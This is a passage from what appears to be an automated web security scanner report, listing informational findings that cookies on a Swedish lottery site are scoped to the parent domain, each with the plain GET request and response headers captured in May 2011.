Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44047


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.222. http://www.svenskalotter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34553


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.223. http://www.svenskalotter.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /AboutUs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37458


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.224. http://www.svenskalotter.com/Affiliates.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Affiliates.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.225. http://www.svenskalotter.com/Charity.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Charity.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Charity.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.226. http://www.svenskalotter.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42942


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.227. http://www.svenskalotter.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /FairPlay.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37156


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.228. http://www.svenskalotter.com/Help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Help.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.229. http://www.svenskalotter.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: www.svenskalotter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=flbkb455khvf04450vdrfe45; path=/; HttpOnly
Set-Cookie: CSI_38=EncryptedUniqueVisitorID=0B0F1C435808DDA7C375069D1945E754&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=svenskalotter.com; expires=Fri, 16-May-2031 11:41:58 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/
Set-Cookie: UniqueVisitorID=0B0F1C435808DDA7C375069D1945E754; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Vary: Accept-Encoding
Content-Length: 34553


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.230. http://www.svenskalotter.com/InviteFriend.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /InviteFriend.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47045


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.231. http://www.svenskalotter.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /PlayersClub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.232. http://www.svenskalotter.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Promotions.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:50 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.233. http://www.svenskalotter.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Responsible.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:01 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42075


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.234. http://www.svenskalotter.com/SecurityAndPrivacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

A cookie issued by the application (see the Set-Cookie headers in the response below) is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35214


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.235. http://www.svenskalotter.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Terms.aspx

Issue detail

